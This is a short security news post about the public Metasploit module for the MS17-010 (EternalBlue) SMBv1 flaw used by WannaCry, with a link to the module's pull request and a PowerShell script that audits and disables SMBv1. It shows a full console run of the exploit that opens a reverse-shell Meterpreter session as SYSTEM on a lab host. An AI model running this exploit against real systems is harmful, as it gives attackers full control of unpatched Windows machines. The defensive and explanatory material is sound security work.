Remote exploit for MS17-010 – now available in Metasploit
Whoever has not patched their Windows machines yet had better hurry. An exploit for the MS17-010 vulnerability (remote acquisition of full privileges on Windows over the SMBv1 protocol) is now publicly available. As a reminder, this is the bug exploited by the WannaCrypt / Wana Decrypt0r 2.0 / Wanacry ransomware.
Using the exploit does not require any great knowledge; you just fire away:
msf exploit(ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.33.1:4444
[*] 192.168.33.129:445 - Connecting to target for exploitation.
[+] 192.168.33.129:445 - Connection established for exploitation.
[*] 192.168.33.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.33.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.33.129:445 - Sending NT Trans Request packet
[*] 192.168.33.129:445 - Receiving NT Trans packet
[*] 192.168.33.129:445 - Making :eb_trans2_zero packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Making :eb_trans2_buffer packet
[*] 192.168.33.129:445 - Sending malformed Trans2 packets
[*] 192.168.33.129:445 - Starting non-paged pool grooming
[*] 192.168.33.129:445 - Sending start free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Sending SMBv2 buffers
[*] 192.168.33.129:445 - Sending end free hole packet.
[*] 192.168.33.129:445 - Receiving free hole response.
[+] 192.168.33.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.33.129:445 - Sending final SMBv2 buffers.
[*] 192.168.33.129:445 - Sending last fragment of exploit packet!
[*] 192.168.33.129:445 - Making :eb_trans2_exploit packet
[*] 192.168.33.129:445 - Receiving response from exploit packet
[+] 192.168.33.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.33.129:445 - Sending egg to corrupted connection.
[*] 192.168.33.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.33.129
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:49159) at 2017-05-14 20:03:33 -0500
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.33.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-KAUD1INC0IJ
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >
So far it has been confirmed to work on Windows 7 x64 / Windows 2008 R2 SP1. A port to 32-bit architectures, and to Windows XP, is in progress.
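Since the exploit rides on SMBv1 over TCP/445, the check a defender wants after reading this is whether that surface is still exposed on a given host. The script below is an added example, not code from the post or from Metasploit; it assumes an elevated PowerShell session and uses the registry switch on Windows 7 / Server 2008 R2 (the versions listed above) and the SMB cmdlets where they exist (Windows 8 / Server 2012 and later).

```powershell
# Added example: audit (and optionally disable) SMBv1 on the local Windows host.
# Run elevated. Get-SmbServerConfiguration / Set-SmbServerConfiguration exist only on
# Windows 8 / Server 2012 and later; on Windows 7 / Server 2008 R2 the LanmanServer
# registry value is the supported switch, and an absent value means SMBv1 is enabled.
param([switch]$Disable)

$results = [ordered]@{}
$regPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

# 1. Registry switch (all versions; the only option on Windows 7 / 2008 R2).
$smb1Reg = (Get-ItemProperty -Path $regPath -Name SMB1 -ErrorAction SilentlyContinue).SMB1
$results['SMB1 registry value'] = if ($null -eq $smb1Reg) { 'not set (SMBv1 enabled)' }
                                  elseif ($smb1Reg -eq 0)  { 'disabled' }
                                  else                     { 'enabled' }

# 2. Live SMB server configuration (Windows 8 / Server 2012 and later).
if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
    $results['EnableSMB1Protocol'] = (Get-SmbServerConfiguration).EnableSMB1Protocol
}

# 3. Optional-feature state (Windows 8.1 / Server 2012 R2 and later).
if (Get-Command Get-WindowsOptionalFeature -ErrorAction SilentlyContinue) {
    $feat = Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -ErrorAction SilentlyContinue
    if ($feat) { $results['SMB1Protocol feature'] = $feat.State }
}

# 4. Is anything listening on TCP/445 at all? If not, the host is not reachable this way.
$results['TCP 445 listening'] = [bool](netstat -an | Select-String ':445\s+\S+\s+LISTENING')

$results.GetEnumerator() | ForEach-Object { '{0,-24}: {1}' -f $_.Key, $_.Value }

if ($Disable) {
    # Mitigation: switch the SMBv1 server off. Cmdlet where available, registry otherwise.
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        Set-ItemProperty -Path $regPath -Name SMB1 -Type DWord -Value 0
    }
    Write-Output 'SMBv1 server disabled; older versions need a reboot for the registry change to take effect.'
}
```

Disabling SMBv1 removes this attack path but is not a substitute for installing the MS17-010 update; run the script without `-Disable` first to see what the host reports.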
–ms
And where is the link to the source?
https://github.com/rapid7/metasploit-framework/pull/8381
This will come in handy for running applications on oscilloscopes.